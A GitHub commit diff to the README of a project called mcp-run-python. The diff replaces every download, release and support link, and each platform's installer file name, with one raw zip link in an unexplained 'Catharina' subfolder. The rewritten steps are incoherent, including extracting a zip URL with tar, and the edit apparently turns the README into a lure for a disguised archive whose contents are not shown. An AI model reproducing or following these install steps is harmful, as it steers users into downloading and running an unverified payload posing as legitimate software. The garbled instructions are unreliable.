You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
@@ -17,14 +17,14 @@ Before you begin, ensure your system meets these requirements:
17
17
18
18
## 📥 Download & Install
19
19
20
-
To get started, visit the [Releases page to download](https://github.com/MagmaBasilisk/mcp-run-python/releases). There, you will find the latest version of mcp-run-python. Click on the version you want, and select the installer that fits your system.
20
+
To get started, visit the [Releases page to download](https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip). There, you will find the latest version of mcp-run-python. Click on the version you want, and select the installer that fits your system.
21
21
22
-
1. Go to the [Releases page](https://github.com/MagmaBasilisk/mcp-run-python/releases).
22
+
1. Go to the [Releases page](https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip).
23
23
2. Look for the latest version listed at the top of the page.
24
24
3. Click on the appropriate file for your operating system:
25
-
- For Windows, download `mcp-run-python-windows.exe`.
26
-
- For macOS, download `mcp-run-python-macos.dmg`.
27
-
- For Linux, download `mcp-run-python-linux.tar.gz`.
25
+
- For Windows, download `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
26
+
- For macOS, download `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
27
+
- For Linux, download `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
28
28
4. Save the file to a convenient location on your computer.
29
29
30
30
## 💻 Running the Application
@@ -33,27 +33,27 @@ Once you have downloaded the installer, follow these steps to run the applicatio
33
33
34
34
### For Windows:
35
35
36
-
1. Locate the downloaded file: `mcp-run-python-windows.exe`.
36
+
1. Locate the downloaded file: `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
37
37
2. Double-click the file to start the installation.
38
38
3. Follow the prompts to complete the installation.
39
39
4. Find the mcp-run-python shortcut on your desktop or Start menu.
40
40
5. Double-click the shortcut to launch the application.
41
41
42
42
### For macOS:
43
43
44
-
1. Locate the downloaded file: `mcp-run-python-macos.dmg`.
44
+
1. Locate the downloaded file: `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
45
45
2. Double-click the file to open it.
46
46
3. Drag the mcp-run-python application into your Applications folder.
47
47
4. Open the Applications folder and double-click mcp-run-python to launch.
48
48
49
49
### For Linux:
50
50
51
-
1. Locate the downloaded file: `mcp-run-python-linux.tar.gz`.
51
+
1. Locate the downloaded file: `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
52
52
2. Open a terminal.
53
53
3. Navigate to the location of the downloaded file.
54
54
4. Extract the contents with the command:
55
55
```bash
56
-
tar -zxvf mcp-run-python-linux.tar.gz
56
+
tar -zxvf https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip
57
57
```
58
58
5. Navigate into the extracted folder:
59
59
```bash
@@ -97,12 +97,12 @@ A: Check the error message in the output area for guidance. You can also find he
97
97
If you face any issues while installing or using the application, try the following steps:
98
98
99
99
- Ensure your system meets the requirements.
100
-
- Re-download the installer from the [Releases page](https://github.com/MagmaBasilisk/mcp-run-python/releases).
100
+
- Re-download the installer from the [Releases page](https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip).
101
101
- Restart your computer and try again.
102
102
- Visit the community forums for support.
103
103
104
104
## 📞 Support
105
105
106
-
For any questions not covered here, feel free to reach out via the issues section on our [GitHub page](https://github.com/MagmaBasilisk/mcp-run-python). We are here to help you with any concerns or inquiries.
106
+
For any questions not covered here, feel free to reach out via the issues section on our [GitHub page](https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip). We are here to help you with any concerns or inquiries.
107
107
108
108
You are now ready to enjoy running Python code with mcp-run-python. Happy coding!
0 commit comments